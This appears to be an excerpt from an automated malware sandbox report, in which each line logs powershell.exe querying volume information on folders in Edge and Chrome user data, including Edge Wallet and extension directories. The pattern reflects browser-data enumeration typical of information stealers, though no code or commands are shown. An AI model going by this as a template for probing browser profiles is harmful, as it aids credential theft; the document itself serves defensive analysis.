Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\en-GB VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\id VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\it VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\ja VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\nl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\ru VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\zh-Hans VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\zh-Hant VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\ar VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\de VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\it VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\sv VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ar VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\de VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\es VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\fr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\id VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\it VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\nl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\pt-BR VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\pt-PT VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ru VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\zh-Hans VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\zh-Hant VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ar VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\de VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\es VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\fr-CA VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ja VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\pt-PT VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\zh-Hans VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\zh-Hant VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0\_metadata VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials\0.0.1.4 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\7.0.0.0 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\2983\_metadata VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent\1.0.0.5 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\_metadata VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
